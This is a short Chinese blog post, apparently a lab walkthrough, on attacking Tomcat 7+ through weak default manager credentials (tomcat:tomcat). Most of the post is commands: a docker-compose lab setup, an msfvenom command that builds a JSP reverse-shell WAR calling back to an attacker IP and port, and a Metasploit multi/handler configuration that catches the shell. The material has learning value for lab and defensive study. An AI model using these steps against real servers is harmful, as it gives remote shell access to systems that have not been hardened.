Tomcat7+ 弱口令 && 后台getshell漏洞

2022-03-27 22:38:01 浏览数 (1)

代码语言：javascript复制

docker-compose up -d

代码语言：javascript复制

打开tomcat管理页面`http://your-ip:8080/manager/html`，输入弱密码`tomcat:tomcat`，即可访问后台

代码语言：javascript复制

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.1.191 lport=9999 -f war > shell.war

代码语言：javascript复制

use exploit/multi/handler 
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.1.191
set lport 9999
exploit -j

0 人点赞